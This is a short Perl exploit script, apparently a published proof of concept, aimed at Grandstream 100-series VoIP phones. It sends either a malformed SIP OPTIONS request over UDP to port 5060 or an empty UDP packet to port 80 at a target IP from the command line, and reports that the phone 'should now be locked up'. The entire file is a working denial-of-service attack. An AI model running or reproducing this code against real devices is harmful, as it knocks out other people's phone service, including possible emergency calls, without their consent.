#!/usr/bin/perl

use IO::Socket;

unless (@ARGV == 2) {
	die ("usage: $0 ".'target_host_ip (attack type: "1" or "2")')
}

my $remote_host = shift(@ARGV);
my $attacktype = shift(@ARGV);

if ($attacktype == 1) {
	print "Attempting incomplete request\n";
	$port = "5060";
	$buf = "OPTIONS\r\r\n";
} elsif ($attacktype == 2) {
	print "Attempting UDP connection on webserver port\n";
	$port = "80";
	$buf = "";
} else {
	die ("attack type not valid\n"."usage: $0 ".'target_host (attack type: "1" or "2")');
}

my $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";
my $ipaddr = inet_aton($remote_host) || $remote_host;
my $portaddr = sockaddr_in($port, $ipaddr);

send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";

print "The Grandstream 100-series phone at '$remote_host' should now be locked up.\n";

# Note: Parts of this code are based on the "SIPd - SIP URI Denial of Service" exploit
# http://www.securityfocus.com/bid/9198/exploit/